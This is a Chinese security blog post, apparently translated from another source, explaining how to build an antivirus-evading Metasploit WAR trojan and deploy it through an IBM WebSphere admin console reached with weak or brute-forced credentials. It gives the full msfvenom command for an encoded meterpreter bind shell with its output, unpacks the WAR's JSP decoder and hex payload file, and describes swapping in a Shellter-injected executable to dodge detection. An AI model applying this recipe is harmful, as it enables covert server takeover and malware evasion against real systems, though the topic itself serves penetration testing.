回归最本质的信息安全

如何打造一款免杀Metasploit WAR木马?

2016年10月19日发布

3,398
0
0

导语:在渗透测试中,我们经常会遇到利用弱口令或是爆破管理员账户进入到了Windonws服务器上的Java应用服务器管理后台。

在渗透测试中,我们经常会遇到利用弱口令或是爆破管理员账户进入到了Windonws服务器上的Java应用服务器管理后台。此时,常见的思路就是上传部署一个 Metasploit 生成的 WAR 应用也就是我们常说的 WAR 木马,以此来控制服务器。但经常因为服务器上杀毒软件的存在,从而导致我们无法正常上传 WAR 木马。

那么就让我们来自己动手打造免杀Metasploit WAR 木马吧。下面我们使用 IBM 的 Websphere 应用服务器(WAS)进行演示。WAS 的管理后台一般可以通过 9060/HTTP 或 9043/HTTPS 进行访问:

• http://IP:9060/ibm/console
• https://IP:9043/ibm/consoler

注意:因为 WAS 通常是以管理员权限运行的,所以当我们成功上传木马后,我们也就获取到了系统权限。

先让我们使用 msfvenom 生成一个 WAR 文件:

root@osi:/tmp# msfvenom --platform windows  -a x86 -p windows/meterpreter/bind_tcp -ex86/shikata_ga_nai -i 2 LPORT=8484 -f war -o /tmp/OSI.war
Found 1compatible encoders
Attempting toencode payload with 2 iterations of x86/shikata_ga_nai
x86/shikata_ga_naisucceeded with size 326 (iteration=0)
x86/shikata_ga_naisucceeded with size 353 (iteration=1)
x86/shikata_ga_naichosen with final size 353
Payload size:353 bytes
Final size ofwar file: 52278 bytes
Saved as:/tmp/OSI.war

不幸的是大多数杀毒软件都能检测出这个文件。那么就让我们来深入挖掘下这个 WAR 文件,看看到底是哪一部分的代码导致被杀毒软件检出的,然后在来看看如何进行免杀。

msfvenom 所生成的 WAR 文件会包含两个文件夹(META-INF 和 WEB-INF)、一个 .txt 文件和一个 .jsp 文件,可以进行如下提取:

root@osi:/tmp# jar –xvf OSI.war
created:    META-INF/
inflated:   META-INF/MANIFEST.MF
created:    WEB-INF/
inflated:   WEB-INF/web.xml
inflated:   aprhqsfojqku.jsp
inflated:   pNJrRWnay.txt

这里的 .jsp 文件只是负责进行十六进制转码的,而真正的 Payload 则是以十六进制编码形式存储在 .txt 文件中。在经过大量的测试后,我们发现杀毒软件主要是基于 .txt 文件进行查杀的,而我们只需要对 .txt 文件进行些许的改动即可实现免杀。

那么开始我们的免杀之旅吧。我们想到思路大概如下,首先使用 Shellter 创建一个可执行文件,随后将这个文件转换成十六进制并替换原先 .txt 文件中的内容,最后上传部署 WAR 应用。那么下面我们先使用 Shellter 注入指定的 Payload 到一个可执行文件中:

下一步就是将这个文件转换成十六进制,并替换原先 .txt 文件中的内容,有很多工具可以实现这个功能,这里我们选择使用 HexConverter 来完成这一任务:

最后就很简单了,上传部署并运行我们修改过后的 WAR 应用就行了:

nice!完工~

本文翻译于obrela,如若转载,请注明来源于嘶吼: http://www.4hou.com/technology/1593.html

点赞 0
取消

感谢您的支持,我会继续努力的!

扫码支持

打开微信扫一扫后点击右上角即可分享哟

Change

Change

嘶吼编辑

发私信

发表评论